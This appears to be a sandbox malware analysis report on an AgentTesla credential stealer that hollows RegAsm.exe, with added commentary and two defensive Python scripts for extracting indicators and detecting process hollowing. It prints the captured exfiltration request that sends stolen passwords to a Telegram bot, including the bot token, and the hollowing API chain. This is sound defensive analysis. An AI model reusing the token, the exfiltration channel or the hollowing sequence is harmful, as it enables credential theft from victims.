                                              Data Ascii: 2CBvWirXPagbDo42z5ga8ka7tNiHyEWE5UH/6sdJLIWlwa7NIGMS5isctEITe7VIbAr5BIy9LPBpAG7Zlyt3VO8b+B+c/8S2HzAw5hP2coHGN6lPO5ICjrBpoXAMcKJMmKMY/O5+AF9fxyy0Rf2zUyhppCnC6YCxm378Uk+nDKoSnEX3eV/SAEhmr1NJmcV5eiifJ3sh/5ItdjzdHN7/UZgqlTwt1s0q3hUrOtGYwmQNHzIXcDKF6HmS4NtWR2Y
                                              2024-09-25 16:51:23 UTC3400INData Raw: 70 66 6c 34 33 4b 41 77 4d 69 4f 36 43 75 73 63 70 54 67 33 6a 46 6c 34 58 6a 64 7a 2b 38 62 59 37 52 51 6f 35 65 35 45 4c 70 49 41 53 45 4d 45 6e 68 6f 48 78 42 77 78 38 46 61 35 79 62 45 64 77 46 39 47 6b 4e 76 46 76 4f 57 61 6f 50 79 48 74 6b 4e 62 78 71 47 4c 54 72 42 36 37 47 55 43 6e 4b 69 57 58 2f 63 6e 47 31 74 6a 44 65 69 43 68 37 58 4c 78 50 49 4e 45 63 42 66 42 6b 6f 4a 53 74 52 77 48 77 36 6e 57 50 45 72 79 53 4e 4e 57 71 50 6f 2f 56 42 42 38 78 30 38 4b 54 4d 46 61 4f 39 30 6b 55 6b 68 52 52 6e 70 69 2b 4b 31 69 64 54 66 57 6a 48 31 63 46 57 58 57 4c 62 6f 63 4f 63 67 39 71 77 55 56 61 4c 73 6b 53 37 32 38 44 64 73 52 37 62 67 43 76 2f 57 38 48 71 77 63 52 35 79 35 74 69 44 37 47 4a 78 6f 61 73 39 67 34 38 75 38 38 47 36 47 47 49 39 4e 37 55
                                              Data Ascii: pfl43KAwMiO6CuscpTg3jFl4Xjdz+8bY7RQo5e5ELpIASEMEnhoHxBwx8Fa5ybEdwF9GkNvFvOWaoPyHtkNbxqGLTrB67GUCnKiWX/cnG1tjDeiCh7XLxPINEcBfBkoJStRwHw6nWPErySNNWqPo/VBB8x08KTMFaO90kUkhRRnpi+K1idTfWjH1cFWXWLbocOcg9qwUVaLskS728DdsR7bgCv/W8HqwcR5y5tiD7GJxoas9g48u88G6GGI9N7U
                                              2024-09-25 16:51:23 UTC4792INData Raw: 38 44 66 54 66 39 46 59 52 59 56 2b 41 42 62 71 4d 49 59 66 76 48 6a 63 68 35 64 75 4f 46 77 75 4d 4a 6e 55 67 4c 72 2b 61 58 4b 44 35 6e 2f 37 44 4f 76 47 43 54 61 6b 4d 4c 57 56 79 35 77 57 34 55 39 4a 78 62 4b 37 78 6c 39 4b 58 71 64 32 4d 73 6f 67 7a 49 42 75 62 68 39 71 78 69 64 48 73 74 77 62 43 6a 31 52 70 64 6e 71 39 65 50 63 6c 79 79 73 7a 47 79 74 43 67 6d 5a 30 43 67 71 4e 67 67 58 32 2b 49 4a 37 69 47 66 52 73 46 4f 6a 65 4a 4b 66 4e 37 5a 56 74 4a 41 63 4e 71 2b 34 54 2b 6b 33 53 4a 44 57 46 6e 4c 5a 75 32 58 35 76 4d 69 6c 33 64 5a 6e 65 55 54 68 6f 65 30 62 70 45 6a 6b 4e 79 72 4c 39 45 68 69 37 6d 4e 4e 70 5a 67 33 68 46 35 57 54 59 6b 43 50 44 62 37 6a 74 46 46 72 70 63 38 4d 6c 74 35 4a 67 4e 32 50 65 78 57 36 44 32 65 56 70 71 33 66 64
                                              Data Ascii: 8DfTf9FYRYV+ABbqMIYfvHjch5duOFwuMJnUgLr+aXKD5n/7DOvGCTakMLWVy5wW4U9JxbK7xl9KXqd2MsogzIBubh9qxidHstwbCj1Rpdnq9ePclyyszGytCgmZ0CgqNggX2+IJ7iGfRsFOjeJKfN7ZVtJAcNq+4T+k3SJDWFnLZu2X5vMil3dZneUThoe0bpEjkNyrL9Ehi7mNNpZg3hF5WTYkCPDb7jtFFrpc8Mlt5JgN2PexW6D2eVpq3fd
                                              2024-09-25 16:51:23 UTC3208INData Raw: 7a 53 42 48 32 72 38 4a 78 42 38 65 53 43 6d 6f 30 61 34 6a 50 34 69 69 45 55 70 56 6b 6a 54 78 47 68 32 2b 57 59 79 53 32 77 5a 33 6a 55 4e 67 31 52 35 42 67 58 57 57 33 6c 56 75 41 31 2b 41 55 54 65 4f 63 4e 6f 34 33 4d 65 49 72 53 59 64 58 41 33 6b 4a 4e 45 50 58 36 49 53 59 42 53 64 30 34 72 44 51 33 2b 54 59 69 62 44 61 6a 39 61 32 36 56 54 38 56 77 59 4a 77 2f 30 79 77 54 74 70 36 61 64 36 4e 66 66 5a 65 49 35 6e 32 63 6d 45 6d 6f 42 4d 35 49 6c 6e 2b 38 63 57 33 4f 67 4f 6f 74 32 75 57 6f 4f 66 41 52 76 61 53 65 73 37 54 6b 71 48 72 68 62 54 67 50 66 55 32 71 75 34 44 4c 6d 66 42 54 4b 4c 5a 6d 48 71 63 56 61 65 53 66 78 73 6d 6e 52 53 51 33 44 31 58 6b 64 63 58 65 68 41 33 71 45 50 57 65 58 2f 63 76 50 62 75 32 42 6a 49 79 4c 61 67 47 39 4d 49 53
                                              Data Ascii: zSBH2r8JxB8eSCmo0a4jP4iiEUpVkjTxGh2+WYyS2wZ3jUNg1R5BgXWW3lVuA1+AUTeOcNo43MeIrSYdXA3kJNEPX6ISYBSd04rDQ3+TYibDaj9a26VT8VwYJw/0ywTtp6ad6NffZeI5n2cmEmoBM5Iln+8cW3OgOot2uWoOfARvaSes7TkqHrhbTgPfU2qu4DLmfBTKLZmHqcVaeSfxsmnRSQ3D1XkdcXehA3qEPWeX/cvPbu2BjIyLagG9MIS
                                              2024-09-25 16:51:23 UTC4984INData Raw: 67 65 4c 6a 6e 43 49 69 61 4b 41 4c 70 78 4d 56 6e 6b 56 50 48 73 44 47 78 2f 62 46 75 4e 6a 2b 47 67 72 43 2f 54 4f 4a 5a 65 52 47 68 7a 59 65 6c 6f 52 6e 73 37 66 47 6a 72 38 71 44 37 2b 51 45 6f 71 35 5a 38 77 54 38 32 30 35 64 50 2f 5a 38 44 47 62 4e 6b 32 7a 78 6e 53 57 34 61 4e 64 4d 6c 44 6f 52 67 44 31 39 7a 78 33 64 43 33 6c 4a 4d 79 41 77 64 6f 4e 72 41 2b 72 59 6b 48 73 6b 36 4c 69 6d 44 66 6a 36 2b 59 69 78 74 61 52 2b 6f 6d 49 30 53 71 70 6c 44 4a 66 71 62 46 46 79 52 76 77 43 55 4a 62 65 70 52 51 52 64 6f 33 35 46 6e 47 56 73 6b 2f 41 6c 54 74 49 30 45 49 4a 4b 35 41 6e 6c 42 6a 4b 4b 52 76 4a 48 41 55 36 6d 71 75 6f 65 4f 43 33 72 59 4e 52 6f 66 6c 52 62 74 51 50 70 76 66 2b 76 75 35 58 78 71 59 75 54 52 58 41 6c 31 45 54 38 75 72 43 4c 34
                                              Data Ascii: geLjnCIiaKALpxMVnkVPHsDGx/bFuNj+GgrC/TOJZeRGhzYeloRns7fGjr8qD7+QEoq5Z8wT8205dP/Z8DGbNk2zxnSW4aNdMlDoRgD19zx3dC3lJMyAwdoNrA+rYkHsk6LimDfj6+YixtaR+omI0SqplDJfqbFFyRvwCUJbepRQRdo35FnGVsk/AlTtI0EIJK5AnlBjKKRvJHAU6mquoeOC3rYNRoflRbtQPpvf+vu5XxqYuTRXAl1ET8urCL4
                                              2024-09-25 16:51:23 UTC3016INData Raw: 4a 75 4e 4e 70 78 2f 2f 30 47 33 53 4b 39 51 56 39 67 41 59 6e 59 6f 77 6b 56 58 39 51 4d 58 56 6a 6b 4e 4f 4a 63 39 69 4c 66 4e 50 47 65 67 31 48 51 48 54 67 74 70 51 47 46 47 66 79 35 73 4d 54 32 31 2b 62 35 55 77 64 79 35 34 43 4a 6b 55 6e 2b 37 58 77 79 78 4f 77 69 5a 45 6c 4e 4e 50 63 4a 51 47 42 39 6c 73 77 67 6a 58 44 55 66 66 36 75 33 67 77 61 53 47 2b 30 32 32 53 65 77 6f 6f 46 35 44 66 6f 33 76 56 2f 6e 32 49 66 59 33 41 59 34 4d 57 70 6e 39 39 77 2b 50 6e 4d 6b 56 4e 63 70 36 59 76 74 6f 66 58 46 50 31 31 59 6f 35 6e 51 5a 49 64 54 67 65 34 4f 4e 32 57 58 2f 79 44 58 45 6c 48 6b 72 4d 36 71 70 37 48 69 4d 4e 35 70 6e 73 34 5a 48 30 44 54 56 75 44 53 79 64 77 6b 4e 51 31 31 74 54 61 67 63 34 55 4f 50 63 65 35 70 65 70 75 44 64 31 64 5a 32 71 78
                                              Data Ascii: JuNNpx//0G3SK9QV9gAYnYowkVX9QMXVjkNOJc9iLfNPGeg1HQHTgtpQGFGfy5sMT21+b5Uwdy54CJkUn+7XwyxOwiZElNNPcJQGB9lswgjXDUff6u3gwaSG+022SewooF5Dfo3vV/n2IfY3AY4MWpn99w+PnMkVNcp6YvtofXFP11Yo5nQZIdTge4ON2WX/yDXElHkrM6qp7HiMN5pns4ZH0DTVuDSydwkNQ11tTagc4UOPce5pepuDd1dZ2qx
                                              2024-09-25 16:51:23 UTC5176INData Raw: 51 70 64 61 4d 78 46 41 6b 4e 4c 52 66 51 58 68 70 71 66 68 42 7a 66 62 42 68 68 53 54 6e 49 74 6b 55 65 32 53 63 38 7a 78 73 2b 41 34 6e 71 2f 70 36 6e 54 33 77 46 56 77 51 45 4a 49 4f 75 6b 47 51 45 76 65 61 7a 54 79 66 31 49 55 64 47 2b 4e 66 4d 48 68 6e 52 50 62 57 49 36 57 75 52 6c 4b 34 2f 53 65 4c 6d 51 41 51 38 52 76 46 48 30 48 52 56 45 34 58 36 6f 50 68 38 33 78 67 49 2b 37 4f 4d 76 41 4a 34 75 5a 34 45 30 4b 51 32 63 39 37 38 5a 55 70 33 7a 52 69 2b 74 42 55 65 56 36 62 77 2b 70 61 70 39 33 63 6b 52 79 74 6f 36 53 43 42 56 7a 77 67 6d 56 4b 66 42 48 30 77 67 75 4f 70 53 4a 46 64 65 48 30 56 66 74 52 6d 70 47 6b 67 2b 4e 7a 43 45 50 56 56 64 42 68 79 6e 59 31 66 4e 43 56 53 38 65 4e 53 38 47 47 52 6f 36 5a 79 44 74 53 37 48 72 76 69 58 6b 2f 4f
                                              Data Ascii: QpdaMxFAkNLRfQXhpqfhBzfbBhhSTnItkUe2Sc8zxs+A4nq/p6nT3wFVwQEJIOukGQEveazTyf1IUdG+NfMHhnRPbWI6WuRlK4/SeLmQAQ8RvFH0HRVE4X6oPh83xgI+7OMvAJ4uZ4E0KQ2c978ZUp3zRi+tBUeV6bw+pap93ckRyto6SCBVzwgmVKfBH0wguOpSJFdeH0VftRmpGkg+NzCEPVVdBhynY1fNCVS8eNS8GGRo6ZyDtS7HrviXk/O


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49705 | 149.154.167.220 | 443 | 3780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-25 16:51:26 UTC | 260 | OUT | POST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8dcdd60c3a34f3c
    Host: api.telegram.org
    Content-Length: 919
    Expect: 100-continue
    Connection: Keep-Alive
2024-09-25 16:51:26 UTC | 25 | IN | HTTP/1.1 100 Continue
                                              2024-09-25 16:51:26 UTC919OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 64 36 30 63 33 61 33 34 66 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 36 39 34 32 31 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 64 36 30 63 33 61 33 34 66 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 35 2f 32 30 32 34 20 31 32 3a 35 31 3a 32 34 0a 55 73 65
                                              Data Ascii: -----------------------------8dcdd60c3a34f3cContent-Disposition: form-data; name="chat_id"-4169421237-----------------------------8dcdd60c3a34f3cContent-Disposition: form-data; name="caption"New PW Recovered!Time: 09/25/2024 12:51:24Use
2024-09-25 16:51:27 UTC | 1054 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 25 Sep 2024 16:51:27 GMT
    Content-Type: application/json
    Content-Length: 666
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":214,"from":{"id":6828335029,"is_bot":true,"first_name":"originlogger","username":"Walshlogs002_bot"},"chat":{"id":-4169421237,"title":"originlogs002","type":"group","all_members_are_administrators":true},"date":1727283087,"document":{"file_name":"user-818225 2024-09-25 12-51-24.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAPWZvQ_j7eHWI2rR_0Csrz8sEXAEncAAhUFAAKr36FHfXGaTbitBjo2BA","file_unique_id":"AgADFQUAAqvfoUc","file_size":320},"caption":"New PW Recovered!\n\nTime: 09/25/2024 12:51:24\nUser Name: user/818225\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}
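Session 1 is the exfiltration, sent from the hollowed RegAsm.exe (PID 3780) straight to the Telegram Bot API. Everything an incident responder needs is in the clear: the bot token in the request path, the destination chat_id in the multipart body, and, in Telegram's JSON reply, the bot's username, the group title and the name of the uploaded credential dump. The script below is an added example for this page, not part of the Joe Sandbox report or of the malware: it reassembles the request body from the report's hex dump (which the report truncates inside the caption after "Use"), parses the multipart form, and combines it with the reply into an IOC record. The PROXY_LOG lines are constructed to exercise the token scanner and are not from the capture.

```python
"""Telegram Bot API exfiltration (session 1): pull the IOCs out of the captured exchange."""
import json
import re
from typing import Dict, List, Sequence, Tuple

# Bot API path as seen in the request line: /bot<numeric id>:<35-character secret>/<method>
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{35})/(\w+)")
# The same token shape anywhere in free text (proxy logs, strings dumps).
BOT_TOKEN_RE = re.compile(r"\bbot(\d{8,12}):([A-Za-z0-9_-]{35})\b")

# Copied from session 1 of the report. BODY is rebuilt from the hex dump, which the
# report truncates inside the caption after "Use"; the full caption is in the reply.
REQUEST_LINE = "POST /bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument HTTP/1.1"
BOUNDARY = "---------------------------8dcdd60c3a34f3c"
BODY = (
    b"\r\n--" + BOUNDARY.encode() + b"\r\n"
    + b'Content-Disposition: form-data; name="chat_id"\r\n\r\n'
    + b"-4169421237\r\n"
    + b"--" + BOUNDARY.encode() + b"\r\n"
    + b'Content-Disposition: form-data; name="caption"\r\n\r\n'
    + b"New PW Recovered!\n\nTime: 09/25/2024 12:51:24\nUse"
)
RESPONSE_JSON = r'''{"ok":true,"result":{"message_id":214,"from":{"id":6828335029,"is_bot":true,"first_name":"originlogger","username":"Walshlogs002_bot"},"chat":{"id":-4169421237,"title":"originlogs002","type":"group","all_members_are_administrators":true},"date":1727283087,"document":{"file_name":"user-818225 2024-09-25 12-51-24.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAPWZvQ_j7eHWI2rR_0Csrz8sEXAEncAAhUFAAKr36FHfXGaTbitBjo2BA","file_unique_id":"AgADFQUAAqvfoUc","file_size":320},"caption":"New PW Recovered!\n\nTime: 09/25/2024 12:51:24\nUser Name: user/818225\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}'''
# Constructed proxy log lines (not from the report) to exercise the token scanner.
PROXY_LOG = [
    "2024-09-25T16:51:26Z 192.168.2.8 POST https://api.telegram.org/bot6828335029:AAHOq6iD_8Eg5u6FhmWF0NHPcKj1jLGtRk4/sendDocument 200",
    "2024-09-25T16:51:30Z 192.168.2.8 GET https://www.example.com/bottle/index.html 200",
]


def parse_bot_path(path: str) -> Dict[str, str]:
    """Split a Bot API path into bot id, secret and method."""
    m = BOT_PATH_RE.match(path)
    if not m:
        raise ValueError(f"not a Telegram Bot API path: {path}")
    return {"bot_id": m.group(1), "token": m.group(2), "method": m.group(3)}


def parse_multipart(body: bytes, boundary: str) -> Dict[str, str]:
    """Return {field name: value} for a multipart/form-data body, tolerating a truncated last part."""
    delim = b"--" + boundary.encode()
    fields: Dict[str, str] = {}
    for part in body.split(delim)[1:]:  # [0] is the preamble before the first delimiter
        if part.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:  # no header/body separator: the capture cut the part short
            continue
        m = re.search(rb'name="([^"]+)"', head)
        if m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields


def parse_caption(caption: str) -> Dict[str, str]:
    """Turn the stealer's 'Key: value' caption lines into a dict; the first line is the headline."""
    lines = [ln for ln in caption.split("\n") if ln.strip()]
    fields = {"headline": lines[0] if lines else ""}
    for ln in lines[1:]:
        key, sep, val = ln.partition(": ")
        if sep:
            fields[key] = val
    return fields


def scan_for_tokens(lines: Sequence[str]) -> List[Tuple[str, str]]:
    """(bot id, secret) pairs found in free text such as proxy logs."""
    return [m.groups() for line in lines for m in BOT_TOKEN_RE.finditer(line)]


def extract_iocs(request_line: str, body: bytes, boundary: str, response_json: str) -> Dict[str, object]:
    """Combine request path, form fields and Telegram's reply into one IOC record."""
    bot = parse_bot_path(request_line.split(" ")[1])
    form = parse_multipart(body, boundary)
    reply = json.loads(response_json)["result"]
    return {
        "bot_id": bot["bot_id"],
        "bot_token": bot["token"],
        "api_method": bot["method"],
        "chat_id": form.get("chat_id"),
        "bot_username": reply["from"]["username"],
        "chat_title": reply["chat"]["title"],
        # Telegram echoes the bot's numeric id; it must equal the id half of the token.
        "token_matches_reply": str(reply["from"]["id"]) == bot["bot_id"],
        "exfil_file": reply["document"]["file_name"],
        "victim": parse_caption(reply.get("caption") or form.get("caption", "")),
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(REQUEST_LINE, BODY, BOUNDARY, RESPONSE_JSON), indent=2))
    print(scan_for_tokens(PROXY_LOG))
```

The token regex is the piece to reuse: a Bot API path is `/bot<digits>:<35 chars>/<method>`, so any proxy or TLS-inspection log line matching BOT_TOKEN_RE from a non-browser process is a high-confidence alert. The caption fields (user name, OS, CPU, RAM) are what the stealer uses to fingerprint the victim and are the same values a second upload from the same host will carry, which makes them useful for correlating multiple sendDocument calls to one infection.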



Target ID: 0
Start time: 12:51:21
Start date: 25/09/2024
Path: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe"
Imagebase: 0xb00000
File size: 208'896 bytes
MD5 hash: 5F249A857AA4EC0D7811CBE49B1EAC0E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 12:51:23
Start date: 25/09/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase: 0xd80000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


                                                Execution Graph

Execution Coverage: 14.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 86.4%
Total number of Nodes: 22
Total number of Limit Nodes: 0
execution_graph
Nodes (id, address, API call where the node is an API):
2781 2d68eb8
2782 2d68eeb
2799 2d69892
2801 2d6869c
2784 2d690ce
2785 2d686a8 Wow64SetThreadContext
2787 2d691db
2786 2d686c0 ReadProcessMemory
2789 2d692b9
2788 2d686d8 VirtualAllocEx
2791 2d69408
2790 2d686e4 WriteProcessMemory
2798 2d69497
2792 2d696c6
2793 2d686e4 WriteProcessMemory
2794 2d6970c
2795 2d686f0 Wow64SetThreadContext
2800 2d697e9
2796 2d68708 ResumeThread
2797 2d686e4 WriteProcessMemory
2802 2d699a8 CreateProcessA
2804 2d69bf2
Edges:
2781->2782 2782->2799 2782->2801 2784->2785 2784->2787 2785->2787 2786->2789 2787->2786 2788->2791 2789->2788 2790->2798 2791->2790 2792->2793 2793->2794 2794->2795 2794->2800 2795->2800 2796->2799 2797->2798 2798->2792 2798->2797 2800->2796 2801->2802 2802->2804
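The API nodes of this graph are the textbook process-hollowing chain: CreateProcessA (the report notes the child is created suspended), a thread-context call and ReadProcessMemory on the new process, VirtualAllocEx, a loop of WriteProcessMemory calls, Wow64SetThreadContext to point the thread at the written image, and ResumeThread; the target is RegAsm.exe according to the process list. The script below is an added example for this page, not part of the Joe Sandbox report: it extracts the API names from the graph dump as printed above, applies a weak unordered check and a strong ordered one, and runs the ordered check on a trace constructed to follow the graph's edges plus a constructed benign trace. The Nt* and CreateProcessW aliases in the stage sets are my additions so the same matcher covers other loaders; nothing in this report uses them.

```python
"""Process-hollowing indicators from the report's execution graph and from API-call traces."""
import re
from typing import List, Optional, Sequence

# The execution graph dump exactly as printed in the report.
EXEC_GRAPH = (
    "execution_graph 2781 2d68eb8 2782 2d68eeb 2781->2782 2799 2d69892 2782->2799 2801 2d6869c "
    "2782->2801 2784 2d690ce 2785 2d686a8 Wow64SetThreadContext 2784->2785 2787 2d691db 2784->2787 "
    "2785->2787 2786 2d686c0 ReadProcessMemory 2789 2d692b9 2786->2789 2787->2786 2788 2d686d8 "
    "VirtualAllocEx 2791 2d69408 2788->2791 2789->2788 2790 2d686e4 WriteProcessMemory 2798 2d69497 "
    "2790->2798 2791->2790 2792 2d696c6 2793 2d686e4 WriteProcessMemory 2792->2793 2794 2d6970c "
    "2793->2794 2795 2d686f0 Wow64SetThreadContext 2800 2d697e9 2794->2795 2794->2800 2795->2800 "
    "2796 2d68708 ResumeThread 2796->2799 2797 2d686e4 WriteProcessMemory 2797->2798 2798->2792 "
    "2798->2797 2800->2796 2802 2d699a8 CreateProcessA 2801->2802 2804 2d69bf2 2802->2804"
)

# A node is "<id> <hex address>" optionally followed by an API name; edges are "<id>-><id>".
NODE_API_RE = re.compile(r"\b(\d+) ([0-9a-f]{6,8}) ([A-Za-z]\w*)")

# Hollowing stages in execution order. Each stage is satisfied by any API in its set;
# the Wow64/Nt variants are assumptions added here so 32-bit and syscall-level loaders match.
HOLLOWING_STAGES = [
    frozenset({"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    frozenset({"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    frozenset({"WriteProcessMemory", "NtWriteVirtualMemory"}),
    frozenset({"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    frozenset({"ResumeThread", "NtResumeThread"}),
]

# Constructed trace: the graph's API nodes in the order its edges imply (CreateProcessA first,
# then context/read, allocate, the WriteProcessMemory loop, context set, resume).
SAMPLE_TRACE = [
    "CreateProcessA",          # node 2802
    "Wow64SetThreadContext",   # node 2785
    "ReadProcessMemory",       # node 2786
    "VirtualAllocEx",          # node 2788
    "WriteProcessMemory",      # node 2790
    "WriteProcessMemory",      # node 2797 (loop via 2798)
    "WriteProcessMemory",      # node 2793
    "Wow64SetThreadContext",   # node 2795
    "ResumeThread",            # node 2796
]
# Constructed benign trace: a parent that spawns a child and waits for it.
BENIGN_TRACE = ["CreateProcessA", "WaitForSingleObject", "GetExitCodeProcess", "CloseHandle"]


def apis_in_graph(dump: str) -> List[str]:
    """API names of the graph's nodes, in the order the dump lists them (not execution order)."""
    return [api for _, _, api in NODE_API_RE.findall(dump)]


def has_hollowing_apis(calls: Sequence[str]) -> bool:
    """Weak check: every stage has at least one API present; order is ignored."""
    seen = set(calls)
    return all(stage & seen for stage in HOLLOWING_STAGES)


def match_hollowing(calls: Sequence[str]) -> Optional[List[int]]:
    """Strong check: the stages occur in order as a subsequence of the trace.

    Unrelated calls between stages are skipped (the sample interleaves ReadProcessMemory
    and repeats WriteProcessMemory), so this is a subsequence match. Returns the indices
    of the calls that satisfied each stage, or None if the chain never completes.
    """
    hits: List[int] = []
    stage = 0
    for i, api in enumerate(calls):
        if api in HOLLOWING_STAGES[stage]:
            hits.append(i)
            stage += 1
            if stage == len(HOLLOWING_STAGES):
                return hits
    return None


if __name__ == "__main__":
    names = apis_in_graph(EXEC_GRAPH)
    print("graph APIs:", names)
    print("all stages present:", has_hollowing_apis(names))
    print("ordered match on graph order:", match_hollowing(names))
    print("ordered match on edge-ordered trace:", match_hollowing(SAMPLE_TRACE))
    print("ordered match on benign trace:", match_hollowing(BENIGN_TRACE))
```

Two points worth noticing when running it. The graph lists nodes by id, with CreateProcessA last, so the ordered matcher returns None on the raw node list even though every stage is present; for a real detection you need a time-ordered API trace (sandbox API log, ETW, or a hooking framework), which is what SAMPLE_TRACE stands in for. And the ordered matcher deliberately ignores the first Wow64SetThreadContext and the ReadProcessMemory, because a debugger or a legitimate installer can call those too; it is the allocate-write-set-context-resume sequence against a freshly created process that is the hollowing signal.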

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2d68eb8-2d68ee9 1 2d68ef0-2d69943 0->1 2 2d68eeb 0->2 5 2d68f88-2d690e8 call 2d61560 call 2d6869c 1->5 6 2d69949-2d69950 1->6 2->1 19 2d69127-2d69193 5->19 20 2d690ea-2d6911c call 2d615b0 5->20 28 2d69195 19->28 29 2d6919a-2d691c0 19->29 20->19 28->29 31 2d691c6-2d691d6 call 2d686a8 29->31 32 2d69270-2d6927a 29->32 36 2d691db-2d691e8 31->36 34 2d69281-2d692d3 call 2d686c0 32->34 35 2d6927c 32->35 43 2d692d5-2d69307 call 2d615b0 34->43 44 2d69312-2d6932b 34->44 35->34 38 2d6921a-2d6921c 36->38 39 2d691ea-2d69218 call 2d686b4 36->39 42 2d69222-2d69230 38->42 39->42 45 2d69232-2d69264 call 2d615b0 42->45 46 2d6926f 42->46 43->44 48 2d6939f-2d6942e call 2d686d8 44->48 49 2d6932d-2d6935f call 2d686cc 44->49 45->46 46->32 68 2d69430-2d69462 call 2d615b0 48->68 69 2d6946d-2d694b7 call 2d686e4 48->69 58 2d69361-2d69393 call 2d615b0 49->58 59 2d6939e 49->59 58->59 59->48 68->69 76 2d694f6-2d6952b 69->76 77 2d694b9-2d694eb call 2d615b0 69->77 82 2d696a4-2d696c0 76->82 77->76 84 2d696c6-2d6972c call 2d686e4 82->84 85 2d69530-2d695b7 82->85 93 2d6972e-2d69760 call 2d615b0 84->93 94 2d6976b-2d6979c 84->94 98 2d695bd-2d69634 call 2d686e4 85->98 99 2d69699-2d6969e 85->99 93->94 101 2d697a3-2d697ce 94->101 102 2d6979e 94->102 115 2d69639-2d69659 